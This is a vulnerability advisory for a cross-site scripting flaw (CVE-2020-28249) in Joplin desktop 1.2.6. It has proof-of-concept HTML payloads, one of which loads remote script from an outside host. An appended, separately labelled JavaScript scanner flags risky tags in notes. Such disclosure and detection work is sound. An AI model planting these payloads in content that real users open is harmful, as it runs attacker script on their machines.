Exploit Title: Joplin 1.2.6 Cross Site Scripting
Date: 2020-10-27
Exploit Author: Philip Holbrook (@fhlipZero)
Vendor Homepage: https://joplinapp.org/
Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
Version: 1.2.6
Tested on: Windows / Mac
CVE : CVE-2020-28249
References:
PENDING next release
-
Technical Details: An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter.
-
PoC: Paste the following payload into a note:
<link rel=import href="data:text/html,<script>alert(1)</script>
<script src="//brutelogic.com.br/1.js#
<script>alert(1)</script>
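
Added example, not part of the original advisory and not Joplin's code: a triage scanner that lists raw HTML tags in a note body that fall outside an allowlist. It matches tag openers without requiring a closing `>`, because the payload lines above leave tags and quotes unterminated. The allowlist, the URL-scheme rule, the function name and the sample note are assumptions constructed for illustration.

```javascript
// Added example (not Joplin code). ALLOWED_TAGS and RISKY_URL are illustrative
// assumptions, not the project's real filter configuration.
const ALLOWED_TAGS = new Set(['a', 'b', 'i', 'em', 'strong', 'p', 'br', 'ul',
  'ol', 'li', 'code', 'pre', 'img', 'blockquote', 'h1', 'h2', 'h3']);

// Tag opener only: the name must be followed by whitespace, '/', '>' or end of
// input. No closing '>' is required, since the PoC lines are unterminated.
// Markdown autolinks such as <https://...> do not match (name is followed by ':').
const TAG_OPENER = /<([a-zA-Z][a-zA-Z0-9-]*)(?=[\s\/>]|$)/g;

// href/src values on allowlisted tags that use a script-capable URL scheme.
const RISKY_URL = /\s(?:href|src)\s*=\s*["']?\s*(?:javascript|data):/i;

function scanNote(body) {
  const findings = [];
  for (const m of body.matchAll(TAG_OPENER)) {
    const tag = m[1].toLowerCase();
    // Attribute text runs to the next '>' or, if unterminated, to end of input.
    const close = body.indexOf('>', m.index);
    const span = body.slice(m.index, close === -1 ? body.length : close);
    const line = body.slice(0, m.index).split('\n').length;
    let reason = null;
    if (!ALLOWED_TAGS.has(tag)) reason = 'tag not on allowlist';
    else if (RISKY_URL.test(span)) reason = 'script-capable URL scheme';
    if (reason) findings.push({ line, tag, reason });
  }
  return findings;
}

// Constructed sample note: benign content, the three PoC lines from this page,
// and one constructed allowlisted tag carrying a data: URL.
const SAMPLE_NOTE = [
  '# Meeting notes',
  'See <a href="https://joplinapp.org/">the site</a> and <b>bold</b> text.',
  '<link rel=import href="data:text/html,<script>alert(1)</script>',
  '<script src="//brutelogic.com.br/1.js#',
  '<script>alert(1)</script>',
  '<a href="data:text/html,hello">constructed link</a>',
].join('\n');

for (const f of scanNote(SAMPLE_NOTE)) {
  console.log(`line ${f.line}: <${f.tag}> ${f.reason}`);
}
```

The scanner is meant for flagging notes for review, not for sanitizing them; it deliberately over-reports rather than trying to parse HTML exactly.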